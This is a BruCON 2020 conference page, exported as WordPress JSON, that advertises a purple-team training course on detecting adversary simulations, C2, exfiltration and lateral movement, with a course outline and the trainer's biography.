{"id":2437,"date":"2020-08-14T15:45:35","date_gmt":"2020-08-14T13:45:35","guid":{"rendered":"https:\/\/archive.brucon.org\/2020\/?page_id=2437"},"modified":"2020-08-17T22:35:56","modified_gmt":"2020-08-17T20:35:56","slug":"in-out-detection-as-code-vs-adversary-simulations-purple-edition","status":"publish","type":"page","link":"https:\/\/archive.brucon.org\/2020\/brucon-2020-training\/in-out-detection-as-code-vs-adversary-simulations-purple-edition\/","title":{"rendered":"In &amp; Out &#8211; Detection as Code vs Adversary Simulations &#8211; Purple Edition"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_column_text]<\/p>\n<h2>Course Description<\/h2>\n<p><span style=\"font-weight: 400\">In &amp; Out &#8211; Detection as Code vs Adversary Simulations &#8211; Purple Edition is an advanced lab-based training created to present participants:\u00a0<\/span><\/p>\n<ul>\n<li><span style=\"font-weight: 400\"> Significance of security events correlation including context to reduce the number of false positives and better detection of adversary activities\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Advanced detection methods and techniques against exfiltration and lateral movement including event mapping, grouping, and tagging\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Understand the tactics and behaviours of the adversary after gaining initial access to the network (Linux\/Windows)\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Detection methods of C2 traffic, tunnelling, hiding, pivoting and custom, simulated malicious network events\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Capabilities of many popular Open Source tools and integration with 3rd party security (IDS\/IPS\/WAF\/EDR\/FPC) and analytics solutions against adversaries C2-based actions\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Verification methods and techniques for product and service providers from IT Security space <\/span><span style=\"font-weight: 400\">\u2192 <\/span><span style=\"font-weight: 400\">in terms of internal testing and PoC \/ PoV programs\u00a0<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400\">The primary goal of this training is to generate offensive attack events\/symptoms within PurpleLABS infrastructure that later should be detected by Open Source SOC stack including Sigma &#8211; the open standard event description rule set and the rest of dedicated, open-source security solutions in use. In this way, participants will thoroughly familiarize themselves with the content of the available Sigma detection rules and their structure, better understand the essence of offensive actions, learn the low-level relationships between data sources, and thus achieve knowledge in creating their own detection rules and eventually bypassing them. We called this approach &#8216;Flip mode&#8217;, i.e. learn detection through the attack in an attractive, standardized form driven by the Open Source community. In addition, participants will use a whole range of open-source (and free commercial) solutions dedicated to SOC environments.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400\">We believe that the unique approach of &#8216;Detection as Code vs Adversary Simulations&#8217; in a condensed format will allow increasing the level of knowledge in the field of RED \/ BLUE \/ PURPLE to both experienced specialists and beginners while maintaining the attractiveness and pleasure of performed tasks &#8211; detection does not have to be boring and tedious!\u00a0<\/span><\/p>\n<h4><b>Virtual infrastructure\u00a0<\/b><\/h4>\n<p><span style=\"font-weight: 400\">This training is based on <em>PurpleLABS<\/em> \u2013 a dedicated virtual infrastructure for conducting detection and analysis of attackers\u2019 behaviour in terms of used techniques, tactics, procedures, and offensive tools. The environment has been set up to serve the constant improvement of competences in the field of threat hunting (threat hunting) and learning about current trends of offensive actions (red-teaming) vs detection phases (blue-teaming).\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400\">PurpleLABS provides analytical interfaces for all relevant data sources from individual systems and network services available in the virtual infrastructure (sysmon, windows events, fw, bro, suricata, fpc, osquery, auth, powershell, waf, proxy, audit, and more).\u00a0<\/span><\/p>\n<p><em><span style=\"font-weight: 400\">Saying that you will get a chance for doing *bonus* detection and hunting steps against all the offensive labs we have available during the training. The coolest thing is after the training you will get an additional 14-days of access to PurpleLabs! Just take a look: <\/span><a href=\"https:\/\/www.defensive-security.com\/purplelabs\/\" target=\"_blank\" rel=\"noopener noreferrer\"><span style=\"font-weight: 400\">https:\/\/www.defensive-security.com\/purplelabs\/\u00a0<\/span><\/a><\/em><\/p>\n<h4><b>Key Learning Objectives\u00a0<\/b><\/h4>\n<ul>\n<li><span style=\"font-weight: 400\"> Learn ways to improve your detection and event correlations skills across many different data sources\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Find the malicious activities and identify threats details on the network\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Prepare your SOC team for fast filtering out network noise and allow for better incident response handling\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Profile your critical OS and network segments in terms of \u2018normal vs exotic\u2019 behaviour\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Find out how DFIR \/ IR Open Source Software can support your SIEM infrastructure\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Learn current trends, techniques, and tools for network exfiltration and lateral movements\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Understand the value of DLP \/ IDS \/ IPS \/ FW \/ WAF \/ Memory Forensics against real adversary lab scenarios\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Understand values from an automated approach to simulating attackers and generating anomalies\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Identify blind spots in your network security posture\u00a0<\/span><\/li>\n<\/ul>\n<p><em><span style=\"font-weight: 400\">Then this training is for you!\u00a0<\/span><\/em>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<\/p>\n<h2>Course contents<\/h2>\n<p><strong>Introduction to Adversary Simulations and Open Source Attack Emulation projects:<\/strong><\/p>\n<ul>\n<li><span style=\"font-weight: 400\"> Atomic Red Team\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> PurpleSharp\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> RTA\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> APT simulator\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Dumpster Fire\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Firebolt\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Flightsim\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> BYOB\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Metta\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Infection Monkey\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Caldera and more<\/span><\/li>\n<\/ul>\n<p><strong>PCAP Exfiltration CTF-style challenge<\/strong><\/p>\n<p><strong> MITRE Attack Framework &amp; Sigma rules \u2192 detection map based on recent examples of chained attack scenarios.\u00a0<\/strong><\/p>\n<p><strong> Finding malicious artifacts using yara, ssdeep, Volatility and memtriage:\u00a0<\/strong><\/p>\n<ul>\n<li><span style=\"font-weight: 400\"> How yara works and why it could be your best friend\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Yarascan + Volatility Framework\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> memtriage\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Yara vs webshells\u00a0<\/span><\/li>\n<\/ul>\n<p><strong> Collecting, analyzing and correlating data from different data sources using:\u00a0<\/strong><\/p>\n<ul>\n<li><span style=\"font-weight: 400\"> Splunk\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Hunting ELK\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Wazuh\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Graylog\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Netflow\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Zeek IDS\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Suricata IDS\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Moloch\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Auditd \/ go-audit\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> eBPF\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> OSquery\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Velociraptor\u00a0<\/span><\/li>\n<\/ul>\n<p><strong> Windows Sysinternals Suite:\u00a0<\/strong><\/p>\n<ul>\n<li><span style=\"font-weight: 400\"> Sysmon: <\/span>\n<ul>\n<li>Process execution events<\/li>\n<li>Network connection events<\/li>\n<li>Image load events<\/li>\n<li>Named pipe events<\/li>\n<li>WMI events<\/li>\n<li>PSexec events<\/li>\n<li>Process Explorer<\/li>\n<li>Process Monitor<\/li>\n<li>Autoruns<\/li>\n<\/ul>\n<\/li>\n<li><span style=\"font-weight: 400\"> Evidence traces of file download and execution: <\/span>\n<ul>\n<li>cmd.exe<\/li>\n<li>HTA<\/li>\n<li>JS<\/li>\n<li>VBS<\/li>\n<li>WSF<\/li>\n<li>JSE<\/li>\n<li>CSharp<\/li>\n<li>certutil<\/li>\n<li>Powershell<\/li>\n<li>Bitsadmin<\/li>\n<\/ul>\n<\/li>\n<li><span style=\"font-weight: 400\">Shellcode injection techniques\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> WebDAV \/ SMB \/ NFS share mapping\u00a0<\/span><\/li>\n<\/ul>\n<p><strong> Low level Linux security tracing and profiling for critical services:\u00a0<\/strong><\/p>\n<ul>\n<li><span style=\"font-weight: 400\"> eBPF\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> sysdig\u00a0<\/span><\/li>\n<\/ul>\n<p><strong> Playing with Zeek IDS \/ Suricata IDS for anomaly detection \u2192 finding malicious artifacts at the network level:\u00a0<\/strong><\/p>\n<ul>\n<li><span style=\"font-weight: 400\"> The importance of network baseline for high-risk environments\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Virtual SPAN \/ TAP and Netflow <\/span><span style=\"font-weight: 400\">\u2192 <\/span><span style=\"font-weight: 400\">OpenVswitch\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Feature definition and extraction\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Bro-cut syntax\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Bro Script Index\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Client \/ server Fingerprinting: <\/span>\n<ul>\n<li>JA3<\/li>\n<li>HASSH<\/li>\n<\/ul>\n<\/li>\n<li>Security feature extraction per many different network protocols<\/li>\n<\/ul>\n<p><strong>Detection and traces of C2 and network exfiltration techniques \u2192 use cases:\u00a0<\/strong><\/p>\n<ul>\n<li><span style=\"font-weight: 400\"> ICMP\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> TCP \/ UDP\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> SSL \/ TLS\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> DNS \/ DoH \/ DGA \/ anomalies\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> HTTP \/ HTTP2 \/ QUIC\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> LDAP Exfil\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Dropbox \/ Twitter \/ Google \/ Mozilla \/ Discord \/ Slack\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> SMB bind named pipes\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Legitimate website covert channel\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Intelligent HTTP C2 Redirection\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Port knocking\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Domain fronting\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> ngrok \/ shooter\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Egress testing and common network traffic on non-standard ports<\/span><\/li>\n<\/ul>\n<p><strong>Detection and traces of C2 post-exploitation, lateral movements \u2192 use cases:\u00a0<\/strong><\/p>\n<ul>\n<li><span style=\"font-weight: 400\"> AD Reconnaissance \/ AD Snapshot\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Bloodhound artifacts\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Golden Ticket\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Silver Ticket\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Kerberoasting\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> RPC over TCP\/IP\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> DCsync \/ DCShadow\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Mimikatz agent\/server\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Pass The Hash\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> SMBexec\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Invoke-WMI\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> WinRM\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Invoke-PSexec\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> PSRemoting\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> RDP wrapping\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Offensive Powershell: <\/span>\n<ul>\n<li>WMI multiple sessions<\/li>\n<li>Remote network relaying<\/li>\n<li>Copy VSS<\/li>\n<li>Keylogging<\/li>\n<li>LSA secrets extraction<\/li>\n<li>Sandbox \/ virtual environment detection<\/li>\n<li>UAC bypassing<\/li>\n<li>Poisoning LLMNR, NBT-NS, MDNS, WPAD and WSUS<\/li>\n<li>SMB ransomware detection.<\/li>\n<li>Browser pivoting<\/li>\n<li>SSH Tunneling and pivoting<\/li>\n<li>RDP Tunneling and pivoting \/ RDP Inception<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><strong> Detection of brute-force attacks \u2192 use cases:\u00a0<\/strong><\/p>\n<ul>\n<li><span style=\"font-weight: 400\"> SQL\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> AD \/ Kerberos\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> SSH\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Web Apps\u00a0<\/span><\/li>\n<\/ul>\n<p><strong> Windows Malware Persistence Methods:\u00a0<\/strong><\/p>\n<ul>\n<li><span style=\"font-weight: 400\"> Service\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Winlogon registry entries\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Run \/ RunOnce\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Scheduled Tasks\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Startup Folder\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> WMI\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> DLL\u00a0<\/span><\/li>\n<\/ul>\n<p><strong> Linux Malware Persistence Methods:\u00a0<\/strong><\/p>\n<ul>\n<li><span style=\"font-weight: 400\"> Service\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Startup scripts\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> SSH magic password\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Port knocking \/ iptables\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Kernel modules\u00a0<\/span><\/li>\n<\/ul>\n<p><strong> Describing and creating relevant log events in generic and open signature \u2192 Sigma rules: <\/strong><\/p>\n<ul>\n<li><span style=\"font-weight: 400\">Application\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> APT\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Linux\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Network\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Proxy\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Web\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Windows\u00a0<\/span><\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][vc_column][vc_column_text]<\/p>\n<h2>Who should take this course?<\/h2>\n<ul>\n<li><span style=\"font-weight: 400\"> Red and Blue team members\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Security \/ Data Analytics\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> CIRT \/ Incident Response Specialists\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Network Security Engineers\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> SOC members and SIEM Engineers\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> AI \/ Machine Learning Developers\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Chief Security Officers and IT Security Directors <\/span><\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<\/p>\n<h2>Requirements<\/h2>\n<ul>\n<li><span style=\"font-weight: 400\"> An intermediate level of command-line syntax experience using Linux and Windows\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Fundament knowledge of TCP\/IP network protocols\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Penetration testing experience performing enumeration, exploiting, and lateral movement is beneficial, but not required\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Basic programming skills are a plus, but not essential\u00a0<\/span><\/li>\n<\/ul>\n<h4><b>Hardware \/ Software Requirements\u00a0<\/b><\/h4>\n<ul>\n<li><span style=\"font-weight: 400\"> VPN client installed according to VPN Setup instructions\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Slack account as an invite to dedicated training channel will be sent\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Stable internet connection\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Recommended: <\/span>\n<ul>\n<li>Zoom client installed<\/li>\n<li>HD Camera to have 1:1 access to an instructor and the rest of the participants. Even virtually, let\u2019s feel each other like we were in the class:)<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><span style=\"font-weight: 400\"><strong>Comment:<\/strong> <em>This training is based on dedicated PurpleLABS cloud infrastructure, so there are no special student\u2019s desktop requirements. No more initial setup issues, just a pure training experience!<\/em><\/span>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;5\/6&#8243;][vc_column_text]<\/p>\n<h2>Trainer Biography<\/h2>\n<p><span style=\"font-weight: 400\"><strong>Leszek Mi\u015b<\/strong> is the Founder of Defensive Security (<\/span><a href=\"http:\/\/www.defensive-security.com\" target=\"_blank\" rel=\"noopener noreferrer\"><span style=\"font-weight: 400\">www.defensive-security.com<\/span><\/a><span style=\"font-weight: 400\">), Principal Trainer and Security Researcher with over 16 years of experience in Cyber Security and Open Source Security Solutions market. He went through the full path of the infosec carrier positions: from OSS researcher, Linux administrator, and system developer and DevOps, through penetration tester and security consultant delivering hardening services and training for the biggest players in the European and global market, to become finally an IT Security Architect \/ SOC Security Analyst with deep non-vendor focus on Network Security attack and detection. He\u2019s got deep knowledge about finding blind spots and security gaps in corporate environments. Perfectly understands technology and business values from delivering structured, automated adversary simulation platform.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400\">Recognized speaker and trainer: BruCON 2017\/2018, Black Hat USA 2019, OWASP Appsec US 2018, FloCon USA 2018, Hack In The Box Dubai \/ Amsterdam \/ Singapore \/ Abu Dhabi 2018\/2019\/2020, 44CON UK 2019, Confidence PL, PLNOG, Open Source Day PL, Secure PL, Advanced Threat Summit PL\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400\">Member of OWASP Poland Chapter.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400\">Author of many IT Security training:\u00a0<\/span><\/p>\n<ul>\n<li><span style=\"font-weight: 400\"> Open Source Defensive Security <\/span><span style=\"font-weight: 400\">\u2192 <\/span><span style=\"font-weight: 400\">The Trinity of Tactics for Defenders\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> In &amp; Out <\/span><span style=\"font-weight: 400\">\u2192 <\/span><span style=\"font-weight: 400\">Network Exfiltration and Post-Exploitation Techniques [RED EDITION]\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> In &amp; Out <\/span><span style=\"font-weight: 400\">\u2192 <\/span><span style=\"font-weight: 400\">Detection of Network Exfiltration and Post-Exploitation Techniques [BLUE EDITION]\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> System Internals \u2013 Network, OS and Memory Forensics\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> SELinux <\/span><span style=\"font-weight: 400\">\u2192 <\/span><span style=\"font-weight: 400\">Development &amp; Administration of Mandatory Access Control Policy\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> Advanced RHEL\/CentOS Defensive Security &amp; Hardening\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> ModSecurity <\/span><span style=\"font-weight: 400\">\u2192 <\/span><span style=\"font-weight: 400\">Development and Management of Web Application Firewall rules\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400\"> FreeIPA <\/span><span style=\"font-weight: 400\">\u2192 <\/span><span style=\"font-weight: 400\">Identity Management for Linux Domain Environments &amp; Trusts\u00a0<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400\">Holds many certifications: OSCP, RHCA, RHCSS, Splunk Certified Architect.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400\">His areas of interest include network \u201cfeatures\u201d extraction, OS internals and forensics. Constantly tries to figure out what the AI\/ML Network Security vendors try to sell. In free time he likes to break into \u201cIoT world\u201d just for fun. Still learning hard every single day.\u00a0<\/span>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/6&#8243; css=&#8221;.vc_custom_1597411551164{padding-top: 50% !important;}&#8221;][vc_single_image image=&#8221;1117&#8243;][\/vc_column][vc_column][vc_column_text]<\/p>\n<h2>Social Media<\/h2>\n<p>Twitter: <a href=\"https:\/\/twitter.com\/cr0nym\" target=\"_blank\" rel=\"noopener noreferrer\">@cr0nym<\/a><\/p>\n<p>Blog: <a href=\"https:\/\/www.defensive-security.com\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/www.defensive-security.com<\/a>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<style type=\"text\/css\">.thegem-button-6a28fa34b2e282505 .gem-button svg {fill: #ffffff;}.thegem-button-6a28fa34b2e282505 .gem-button:hover svg {fill: #ffffff;}<\/style><div class=\"gem-button-container gem-button-position-fullwidth thegem-button-6a28fa34b2e282505    \"  ><a class=\"gem-button gem-button-size-giant gem-button-style-flat gem-button-text-weight-normal\" data-ll-effect=\"drop-right-without-wrap\" style=\"border-radius: 3px;background-color: #b43836;color: #ffffff;\" onmouseleave=\"this.style.backgroundColor='#b43836';this.style.color='#ffffff';\" onmouseenter=\"this.style.backgroundColor='#ef5047';this.style.color='#ffffff';\" href=\"https:\/\/brucon0x0c-training.eventbrite.co.uk\" target=\"_self\">Buy Training Ticket<\/a><\/div> [\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_empty_space][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column][vc_column_text] Course Description In &amp; Out &#8211; Detection as Code vs Adversary Simulations &#8211; Purple Edition is an advanced lab-based training created to present participants:\u00a0 Significance of security events correlation including context to reduce the number of false positives and better detection of adversary activities\u00a0 Advanced detection methods and techniques against exfiltration and lateral movement including event mapping, grouping, and tagging\u00a0 Understand the tactics and behaviours of the adversary after gaining initial access to the&#8230;<\/p>\n","protected":false},"author":8,"featured_media":0,"parent":75,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-2437","page","type-page","status-publish"],"_links":{"self":[{"href":"https:\/\/archive.brucon.org\/2020\/wp-json\/wp\/v2\/pages\/2437","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/archive.brucon.org\/2020\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/archive.brucon.org\/2020\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/archive.brucon.org\/2020\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/archive.brucon.org\/2020\/wp-json\/wp\/v2\/comments?post=2437"}],"version-history":[{"count":9,"href":"https:\/\/archive.brucon.org\/2020\/wp-json\/wp\/v2\/pages\/2437\/revisions"}],"predecessor-version":[{"id":2485,"href":"https:\/\/archive.brucon.org\/2020\/wp-json\/wp\/v2\/pages\/2437\/revisions\/2485"}],"up":[{"embeddable":true,"href":"https:\/\/archive.brucon.org\/2020\/wp-json\/wp\/v2\/pages\/75"}],"wp:attachment":[{"href":"https:\/\/archive.brucon.org\/2020\/wp-json\/wp\/v2\/media?parent=2437"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}